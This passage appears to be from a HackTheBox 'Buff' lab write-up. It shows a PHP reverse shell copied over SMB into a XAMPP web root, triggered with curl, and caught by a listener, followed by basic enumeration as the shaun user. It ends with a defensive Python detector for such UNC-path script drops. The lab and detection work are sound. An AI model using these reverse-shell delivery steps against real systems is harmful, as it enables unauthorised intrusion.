Shell Upgrade


c:\xampp\htdocs\gym\upload> copy \\10.10.14.11\smb\shell.php ..\shell.php
�PNG

        1 file(s) copied.

Placing a PHP reverse shell at the web root over SMB

Delivery complete

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ curl http://10.10.10.198:8080/shell.php

Triggering the backdoor

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ nnc 9999              
listening on [any] 9999 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.198] 49775
socket: Shell has connected! PID: 9028
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
 
c:\xampp\htdocs\gym> whoami
buff\shaun
 
c:\xampp\htdocs\gym> hostname
BUFF
 
c:\xampp\htdocs\gym> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . : htb
   ipv6 address. . . . . . . . . . . : dead:beef::23b
   ipv6 address. . . . . . . . . . . : dead:beef::e98a:2472:1538:99c6
   temporary ipv6 address. . . . . . : dead:beef::e531:24da:e024:53e7
   link-local ipv6 address . . . . . : fe80::e98a:2472:1538:99c6%10
   ipv4 address. . . . . . . . . . . : 10.10.10.198
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%10
                                       10.10.10.2

Initial foothold established on the target system as the shaun user
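
A defender-side check for the delivery step above, as an added example that is not part of the original write-up: it flags process-creation events whose command line copies a server-side script from a UNC path into the web root, resolving relative destinations such as `..\shell.php` against the working directory. The event fields (`cwd`, `cmdline`), the extension list, the `fileserver` host and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

WEB_ROOT = r"c:\xampp\htdocs"              # web root seen in the session above
SCRIPT_EXTS = {".php", ".phtml", ".phar"}  # assumption: extensions the server executes
# copy/xcopy/move <source> <destination>; unquoted paths only (simplification)
COPY_RE = re.compile(r"^\s*(?:copy|xcopy|move)\s+(\S+)\s+(\S+)", re.IGNORECASE)

# Constructed process-creation events (hypothetical fields: cwd, cmdline)
SAMPLE_EVENTS = [
    {"cwd": r"c:\xampp\htdocs\gym\upload",
     "cmdline": r"copy \\10.10.14.11\smb\shell.php ..\shell.php"},
    {"cwd": r"c:\xampp\htdocs\gym\upload",
     "cmdline": r"copy \\10.10.14.11\smb\shell.php .."},
    {"cwd": r"c:\xampp\htdocs\gym",
     "cmdline": r"copy \\fileserver\share\report.php c:\temp\report.php"},
    {"cwd": r"c:\xampp\htdocs\gym",
     "cmdline": r"copy c:\temp\index.php index.php"},
]

def flag_remote_script_drop(event, web_root=WEB_ROOT):
    """Return the resolved destination if the event copies a server-side
    script from a UNC path into the web root, else None."""
    m = COPY_RE.match(event["cmdline"])
    if not m:
        return None
    src, dst = m.groups()
    if not src.startswith("\\\\"):  # source must be a UNC path (\\host\share\...)
        return None
    # Resolve relative destinations (..\shell.php) against the process cwd
    resolved = ntpath.normpath(ntpath.join(event["cwd"], dst)).lower()
    if ntpath.splitext(resolved)[1] == "":  # heuristic: destination is a directory
        resolved = ntpath.join(resolved, ntpath.basename(src).lower())
    root = ntpath.normpath(web_root).lower()
    in_root = resolved == root or resolved.startswith(root + "\\")
    if in_root and ntpath.splitext(resolved)[1] in SCRIPT_EXTS:
        return resolved
    return None

def scan(events):
    """Return (cmdline, resolved_path) for every flagged event."""
    hits = ((ev["cmdline"], flag_remote_script_drop(ev)) for ev in events)
    return [(c, p) for c, p in hits if p]

if __name__ == "__main__":
    for cmdline, path in scan(SAMPLE_EVENTS):
        print(f"ALERT script dropped into web root: {path}  <-  {cmdline}")
```

Matching on the literal string `htdocs` in the command line would miss the copy shown above, because the destination is relative; the working directory is needed to resolve it.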